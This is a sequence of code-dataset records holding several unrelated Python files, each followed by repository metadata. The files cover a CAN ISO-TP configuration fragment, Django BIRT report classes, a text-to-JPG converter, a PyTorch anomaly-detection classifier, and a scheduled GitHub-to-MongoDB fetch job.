ecuMsg.ctrl.tx.FDF = enable_fdf
ecuMsg.ctrl.tx.BRS = enable_brs
ecuMsg.ctrl.tx.IDE = enable_ide
ecuMsg.ctrl.tx.DLC = dlc
ecuMsg.setMessageId(ecu_msg_id)
self._isotp_config.ecuDataTemplate.setCanMessage(ecuMsg)
padding = kwargs.get('padding', None)
if padding is not None:
self._isotp_config.paddingEnabled = 1
self._isotp_config.paddingValue = ctypes.c_uint8(padding)
else:
self._isotp_config.paddingEnabled = 0
| Aceinna/acenav-cli | src/aceinna/devices/widgets/can/interfaces/bmcan/canlib.py | canlib.py | py | 13,564 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "can.BusABC",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "ctypes.c_int",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "ctypes.byref",
"line_nu... |
29110585681 | #-*- encoding: UTF-8 -*-
import urllib
from AlyMoly.reporte.excepciones import AbstractClassException
from AlyMoly.settings import REPORT_HOST, REPORT_PORT, REPORT_APP, REPORT_DIR,\
NOMBRE_SUCURSAL, CANTIDAD_PRODUCTOS_MAS_VENDIDOS,\
CANTIDAD_PROMOCIONES_MAS_VENDIDAS
from AlyMoly.reporte.conexion import URLRetriever
from django.http import HttpResponse
from django.core.urlresolvers import reverse
from HTMLParser import HTMLParser
import htmlentitydefs
class HTMLReportFixer(HTMLParser):
"""Cambia el título de una página html, a un titulo más institucional"""
def __init__(self):
HTMLParser.__init__(self)
self.flag = False
self.pieces = []
def handle_starttag(self, tag, attrs):
if tag == 'title':
self.flag = True
if tag == 'img':
new_attrs = []
for k,v in attrs:
if k == 'src':
v = v.replace('/birt/preview',reverse('reporte:get_birt_img'))
new_attrs.append((k,v.encode()))
attrs = new_attrs
strattrs = "".join([' %s="%s"' % (key, value) for key, value in attrs])
self.pieces.append("<%(tag)s%(strattrs)s>" % locals())
def handle_endtag(self, tag):
if tag == 'title':
self.flag = False
self.pieces.append("</%(tag)s>" % locals())
def handle_data(self, data):
if self.flag:
data = "Reporte | %s" % (NOMBRE_SUCURSAL)
self.pieces.append("%(data)s" % locals())
def handle_charref(self,ref):
self.pieces.append("&#%(ref)s;" % locals())
def handle_comment(self, text):
self.pieces.append("<!--%(text)s-->" % locals())
def handle_entityref(self, ref):
self.pieces.append("&%(ref)s" % locals())
if htmlentitydefs.entitydefs.has_key(ref):
self.pieces.append(";")
def handle_pi(self, text):
self.pieces.append("<?%(text)s>" % locals())
def handle_decl(self, text):
self.pieces.append("<!%(text)s>" % locals())
def output(self):
return "".join(self.pieces).replace("\n",'').strip()
class Reporte(object):
"""Clase abstracta padre que implementa la representacion un reporte genérico de
archivo de reporte"""
HTML = 'html'
PDF = 'pdf'
FORMATO = ( HTML, )
def __new__(self, *args):
if self is Reporte :
raise AbstractClassException
return object.__new__(self)
def __init__(self,data):
self.extension = "rptdesign"
self.params = {}
self.formato = data['formato']
def __unicode__(self):
return self.nombre + '.' + self.extension
def get_url_params(self):
list_params = []
for key,val in self.params.items():
list_params.append(key + "=" + urllib.quote(str(val)))
url_params = "&".join(list_params)
if url_params != '':
return "&"+url_params
return ''
def get_filename(self):
return "%s.%s" % (self.nombre,self.extension)
def get_url(self):
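# Builds the BIRT viewer preview URL; with hypothetical settings the result looks like:
# http://localhost:8080/birt/preview?__format=html&__report=reports/Productos.rptdesign&turno_id=1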
return ("http://%s:%s/%s/preview?__format=%s&__report=%s%s" % (REPORT_HOST,
REPORT_PORT,
REPORT_APP,
self.formato,
REPORT_DIR, self.get_filename())) + self.get_url_params()
def get_response(self):
retriever = URLRetriever(self.get_url())
response = None
if self.formato == 'pdf':
response = HttpResponse(retriever.get(),mimetype='application/pdf')
response['Content-Disposition'] = 'attachment; filename=%s.pdf' % self.__class__.__name__
else:
parser = HTMLReportFixer()
parser.feed(retriever.get())
response = HttpResponse(parser.output())
return response
class ReportePeriodoTiempo(Reporte):
def __new__(self, *args):
if self is ReportePeriodoTiempo :
raise AbstractClassException
return object.__new__(self)
def __init__(self,data):
super(ReportePeriodoTiempo,self).__init__(data)
fecha_inicio = 'fecha_inicio'
fecha_fin = 'fecha_fin'
if data.get('fecha',False):
fecha_inicio = fecha_fin = 'fecha'
self.params.update({'fecha_inicio':data[fecha_inicio].strftime('%Y-%m-%d'),
'fecha_fin':data[fecha_fin].strftime('%Y-%m-%d')})
########## REPORTS ##########
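# Each concrete report below just names its .rptdesign file and maps the validated
# form data to BIRT report parameters. Hypothetical usage from a view:
#   reporte = Existencias({'formato': Reporte.HTML, 'bodega': 1})
#   return reporte.get_response()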
class Productos(Reporte):
def __init__(self,data):
super(Productos,self).__init__(data)
self.nombre = "Productos"
class ProductosCodigoBarra(Reporte):
def __init__(self,data):
super(ProductosCodigoBarra,self).__init__(data)
self.nombre = "ProductosCodigoBarra"
class ProductosCodigoManual(Reporte):
def __init__(self,data):
super(ProductosCodigoManual,self).__init__(data)
self.nombre = "ProductosCodigoManual"
class ProductosExentos(Reporte):
def __init__(self,data):
super(ProductosExentos,self).__init__(data)
self.nombre = "ProductosExentos"
class ProductosAfectos(Reporte):
def __init__(self,data):
super(ProductosAfectos,self).__init__(data)
self.nombre = "ProductosAfectos"
class Promociones(Reporte):
def __init__(self,data):
super(Promociones,self).__init__(data)
self.nombre = "Promociones"
class Existencias(Reporte):
def __init__(self,data):
super(Existencias,self).__init__(data)
self.nombre = "Existencias"
self.params.update({
'bodega_id':data['bodega'],
})
class ExistenciaPorCategoria(Reporte):
def __init__(self,data):
super(ExistenciaPorCategoria,self).__init__(data)
self.nombre = "ExistenciasPorCategoria"
self.params.update({
'bodega_id':data['bodega'],
'categoria_id':data['categoria']
})
class VentasPorTurno(Reporte):
def __init__(self,data):
super(VentasPorTurno,self).__init__(data)
self.nombre = "EstadoDeTurno"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoDetalle(Reporte):
def __init__(self,data):
super(VentasPorTurnoDetalle,self).__init__(data)
self.nombre = "VentasPorTurno"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenAfectos(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenAfectos,self).__init__(data)
self.nombre = "VentasPorTurnoResumenAfectos"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenExentos(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenExentos,self).__init__(data)
self.nombre = "VentasPorTurnoResumenExentos"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenDevoluciones(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenDevoluciones,self).__init__(data)
self.nombre = "VentasPorTurnoResumenDevoluciones"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenPromociones(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenPromociones,self).__init__(data)
self.nombre = "VentasPorTurnoResumenPromociones"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorTurnoResumenStockCritico(Reporte):
def __init__(self,data):
super(VentasPorTurnoResumenStockCritico,self).__init__(data)
self.nombre = "VentasPorTurnoResumenStockCritico"
self.params.update({
'turno_id':data['turno'],
})
class VentasPorMes(Reporte):
def __init__(self,data):
super(VentasPorMes,self).__init__(data)
self.nombre = "VentaPorMes"
fecha = data['anio'] + '-' + data['mes'] + '-01'
self.params.update({
'mes_turno':fecha,
})
class VentasGraficoProducto(ReportePeriodoTiempo):
def __init__(self,data):
super(VentasGraficoProducto,self).__init__(data)
self.nombre = "VentaGraficoProductosPorFechaPorCategorias"
self.params.update({
'cantidad':CANTIDAD_PRODUCTOS_MAS_VENDIDOS,
})
class VentasGraficoPromocion(ReportePeriodoTiempo):
def __init__(self,data):
super(VentasGraficoPromocion,self).__init__(data)
self.nombre = "VentaGraficoPromocionesPorFechaPorCategorias"
self.params.update({
'cantidad':CANTIDAD_PRODUCTOS_MAS_VENDIDOS,
})
class VentasGraficoProductoPorCategoria(ReportePeriodoTiempo):
def __init__(self,data):
super(VentasGraficoProductoPorCategoria,self).__init__(data)
self.nombre = "VentaGraficoProductosPorFechaPorCategoria"
self.params.update({
'cantidad':CANTIDAD_PROMOCIONES_MAS_VENDIDAS,
'categoria_id':data.get("categoria"),
})
class VentasGraficoPromocionPorCategoria(ReportePeriodoTiempo):
def __init__(self,data):
super(VentasGraficoPromocionPorCategoria,self).__init__(data)
self.nombre = "VentaGraficoPromocionesPorFechaPorCategoria"
self.params.update({
'cantidad':CANTIDAD_PROMOCIONES_MAS_VENDIDAS,
'categoria_id':data.get("categoria"),
})
class VentasPorMesResumido(Reporte):
def __init__(self,data):
super(VentasPorMesResumido,self).__init__(data)
self.nombre = "VentaPorMesResumido"
fecha = data['anio'] + '-' + data['mes'] + '-01'
self.params.update({
'mes_turno':fecha,
})
| CreceLibre/alymoly | AlyMoly/reporte/clases.py | clases.py | py | 10,496 | python | es | code | 0 | github-code | 1 | [
{
"api_name": "HTMLParser.HTMLParser",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "HTMLParser.HTMLParser.__init__",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "HTMLParser.HTMLParser",
"line_number": 17,
"usage_type": "name"
},
{
"api_na... |
18209204664 | from const import *
import sys
from datetime import datetime
import numpy as np
import cv2
import os
from time import sleep
from threading import *
from utils import *
def removeTxt(txtBuffer):
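"""Remove every .txt file from the given buffer directory."""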
txtFileList = os.listdir(txtBuffer)
for item in txtFileList:
if item.endswith(".txt"):
os.remove(os.path.join(txtBuffer, item))
def storeTxtToJpg(TXT_PATH,IMAGE_PATH,label,mode="dataCollection"):
"""
TXT_PATH: folder name of the txt files
IMAGE_PATH: destinated image folder to save, DO NOT include filename like .jpg
mode: 'dataCollection' or 'prediction'
"""
def arrayFromFile(file_name):
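"""Parse a comma-separated matrix of floats from file_name; returns (array, status) where status is True on success."""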
arr=[]
status=-1
try:
with open(file_name,'r') as f:
for line in f.readlines(): #line is a string
line_arr=[float(x) for x in line.split(",")]
arr.append(line_arr)
arr=np.array(arr)
status=True
except:
status=False
return arr, status
def isEmptyTxt(file_name):
return os.stat(f"{file_name}").st_size == 0
def currentTimeInfo():
return datetime.now().strftime("%Y%m%d_%H%M%S")
#convert all txt files from {TXT_PATH} into jpg images and store them in {IMAGE_PATH}
#1. list all files name with txt extension
if mode=="dataCollection":
destination_folder= os.path.join(IMAGE_PATH,f"{label}")
for file in os.listdir(TXT_PATH):
if file.endswith(".txt"):
file_name=os.path.join(TXT_PATH,file)
if not isEmptyTxt(file_name):
print(file_name)
img_array,result=arrayFromFile(file_name)
if not result:  # parsing failed, skip this file
continue
sleep(1)
#cv2.imwrite(img_)
#path=os.path.join("images","your_file.jpg")
output_path=os.path.join(destination_folder,currentTimeInfo()+".jpg")
print(f"output_path={output_path}")
cv2.imwrite(output_path,img_array)
#print("complete image writing")
elif mode=="prediction":
destination_folder= os.path.join(IMAGE_PATH,f"{label}")
for file in os.listdir(TXT_PATH):
if file.endswith(".txt"):
file_name=os.path.join(TXT_PATH,file)
if not isEmptyTxt(file_name):
print(file_name)
img_array, result = arrayFromFile(file_name)
if not result:
continue
sleep(1)
#cv2.imwrite(img_)
#path=os.path.join("images","your_file.jpg")
output_path=os.path.join(destination_folder,"0.jpg")
print(f"output_path={output_path}")
cv2.imwrite(output_path,img_array)
print("complete image writing")
else:
raise Exception("INVALID MODE IN storeTxtToJpg()")
def moveToBuffer(FromPath,ToPath):
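"""Move every file from FromPath into ToPath."""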
print("moving files from txtStorage to txtBuffer")
source = FromPath
destination = ToPath
# gather all files
allfiles = os.listdir(source)
# iterate on all files to move them to destination folder
for f in allfiles:
src_path = os.path.join(source, f)
dst_path = os.path.join(destination, f)
os.rename(src_path, dst_path)
if __name__=='__main__':
if len(sys.argv) != 3:
raise Exception("""MISSING ARGUMENT(S)!!!
python3 txtToJpg.py [train/test] [label]
""")
if not (sys.argv[1]=='test' or sys.argv[1]=='train'):
print("NO SUCH MODE, PLEASE ENTER test or train as mode")
print("QUIT")
quit()
jsonAccesser=ConfJsonDictAccesser()
conf_json_dict=jsonAccesser.get_dict()
modelDataType=conf_json_dict["modelDataType"]
if sys.argv[1]=='test':
if modelDataType==jsonAccesser.DataLengthType.fix:
path=FIXED_LENGTH_TEST_PATH
elif modelDataType==jsonAccesser.DataLengthType.unfix:
path=VARIED_LENGTH_TEST_PATH
elif sys.argv[1]=='train':
if modelDataType==jsonAccesser.DataLengthType.fix:
path=FIXED_LENGTH_TRAIN_PATH
elif modelDataType==jsonAccesser.DataLengthType.unfix:
path=VARIED_LENGTH_TRAIN_PATH
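# Pipeline: stage txt captures into the buffer, convert them to labelled jpgs, then clear the buffer.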
moveToBuffer(TXT_PATH,TXT_BUFFER)
storeTxtToJpg(TXT_BUFFER,path,sys.argv[2])
removeTxt(TXT_BUFFER)
| navilo314hku/FYP | txtToJpg.py | txtToJpg.py | py | 4,636 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.listdir",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.remove",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 16,
... |
727279415 | from torchvision import models
import torch.nn.functional as nnf
import torch.nn as nn
import utilities
import config
import torch
import time
import sys
import os
class Classify():
def __init__(self, logs):
self.logs = logs
self.modelPath = os.path.join(config.ROOT_DIRECTORY,config.MODEL_ROOT_DIR)
# Set up the initial parameters for neural network prediction
self.device = torch.device(config.TORCH_DEVICE if torch.cuda.is_available() else "cpu")
if self.device.type == 'cuda':
self.logs.logger.info(f"Initiasaion: Using {self.device.type} on {torch.cuda.get_device_name(torch.cuda.current_device())} as torch device")
else:
self.logs.logger.info(f"Initiasaion: Using {self.device.type} as torch device.")
self._loadModel()
# Load the selected model with PyTorch and prepare it for prediction
def _loadModel(self):
try:
startTime = time.time()
if config.TORCH_MODEL == "mobilenet_v3_large":
self.model = models.mobilenet_v3_large(pretrained=False)
elif config.TORCH_MODEL == "efficientnet_b7":
self.model = models.efficientnet_b7(pretrained=False)
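# Replace the classifier head so the network outputs the 20 target categories
# (the 2560 input features match torchvision's efficientnet_b7).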
self.model.classifier[1] = nn.Linear(in_features=2560, out_features=20)
self.model.load_state_dict(torch.load(os.path.join(self.modelPath, f"{config.TORCH_MODEL}.pth")))
self.model.eval()
self.model.to(self.device)
self.logs.logger.info(f"Initiasaion: Model {config.TORCH_MODEL.split('.')[0]} is loaded.")
if config.LOG_TIME: self.logs.logger.info(f"Model initiasation took {time.time()-startTime:.4f}s")
except:
self.logs.logger.critical("Something when wrong during torch model initialisation")
sys.exit(1)
# Check the neural network's output after prediction
def _checkPrediction(self,output, fileName):
# Convert the output to percentage form and pick the highest value
probs = nnf.softmax(output, dim=1)
topProb, topClass = probs.topk(1, dim = 1)
mappedClass = topClass.item()
# Map the output index to a category name
if mappedClass < 16:
mappedClass = config.REVERSE_CATEGORIES_MAP[mappedClass]
# Strip the specific attack name, keeping only the category
if not config.CATEGORIES_FULL_NAME: mappedClass = str(mappedClass).split(' ')[0]
# Record the result in the logs
if int(topClass.item()) > 0:
if fileName.split('.')[-1] == "csv":
self.logs.logger.warning(f"{float(topProb.item()*100):.4f}% {fileName} CSV {mappedClass}")
else:
self.logs.logger.info(f"{float(topProb.item()*100):.4f}% {fileName} Image {mappedClass}")
else:
if fileName.split('.')[-1] == "csv":
path = os.path.join(config.ROOT_DIRECTORY, config.CSV_DIRECTORY)
utilities.csvRename(path, fileName, "FP"+fileName) #Tagovanie súboru v prípade FP
self.logs.logger.info(f"{float(topProb.item()*100):.4f}% {fileName} CSV {mappedClass} FalsePositive")
else:
self.logs.logger.info(f"{float(topProb.item()*100):.4f}% {fileName} Image {mappedClass} Negative")
return (float(topProb.item()),mappedClass)
# Run a prediction on an image
def getPrediction(self,image):
startTime = time.time()
try:
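# Inference only: run the forward pass with autograd disabled.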
with torch.no_grad():
input = image[0].unsqueeze(0)
input = input.to(self.device)
outputs = self.model.forward(input)
if config.LOG_TIME: self.logs.logger.info(f"Prediction took {time.time()-startTime:.4f}s")
return self._checkPrediction(outputs, image[1])
except:
self.logs.logger.error("Something when wrong during predictions")
| p4z1/NN-anomaly-detection-system | centrala/netServer.py | netServer.py | py | 3,955 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "config.ROOT_DIRECTORY",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "config.MODEL_ROO... |
74339324514 | import os
import sys
import requests
from pymongo import MongoClient
from apscheduler.schedulers.blocking import BlockingScheduler
# For simplicity, we are hardcoding the GitHub URL here. It must point at the raw
# file contents (not the HTML blob page) for response.json() to work.
GITHUB_URL = "https://raw.githubusercontent.com/akto-api-security/pii-types/master/general.json"
# We can also pass the GitHub URL as an environment variable or as a command line argument.
# GITHUB_URL = os.environ.get("GITHUB_URL") if os.environ.get("GITHUB_URL") else sys.argv[1] if len(sys.argv) > 1 else print("Please provide a GitHub URL.")
MONGO_URI = os.environ.get("MONGO_URI", "mongodb://localhost:27017")
MONGO_DB_NAME = os.environ.get("MONGO_DB_NAME", "pii_data")
MONGO_COLLECTION_NAME = os.environ.get("MONGO_COLLECTION_NAME", "patterns")
CRON_MINUTES = os.environ.get("CRON_MINUTES", 60)
client = MongoClient(MONGO_URI)
db = client[MONGO_DB_NAME]
collection = db[MONGO_COLLECTION_NAME]
def fetch_data(github_url: str):
"""
Fetches data from the given GitHub URL and updates the MongoDB collection.
"""
response = requests.get(github_url)
if response.ok:
data = response.json()
if isinstance(data, dict):
data = [data]
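# Replace the collection contents wholesale: clear the old patterns, then bulk-insert the fresh ones.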
collection.delete_many({})
collection.insert_many(data)
print("Data fetched and updated in MongoDB.")
else:
print("Error fetching data from GitHub.")
def trigger(minutes=int(CRON_MINUTES), github_file_link=GITHUB_URL):
"""
Triggers the fetch_data function every given number of minutes (default: 60 minutes).
"""
scheduler = BlockingScheduler()
# For a single URL, you can use the following code:
scheduler.add_job(fetch_data, 'interval', minutes=minutes, args=[github_file_link])
# For multiple URLs, schedule one job per URL, e.g.:
# GITHUB_URLS = ["https://raw.githubusercontent.com/rabilrbl/akto/master/patterns.json", "https://raw.githubusercontent.com/rabilrbl/akto2/master/patterns.json"]
# for url in GITHUB_URLS:
#     scheduler.add_job(fetch_data, 'interval', minutes=minutes, args=[url])
scheduler.start()
if __name__ == "__main__":
trigger()
| rabilrbl/Akto-Assessment | script.py | script.py | py | 2,073 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.environ.get",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_... |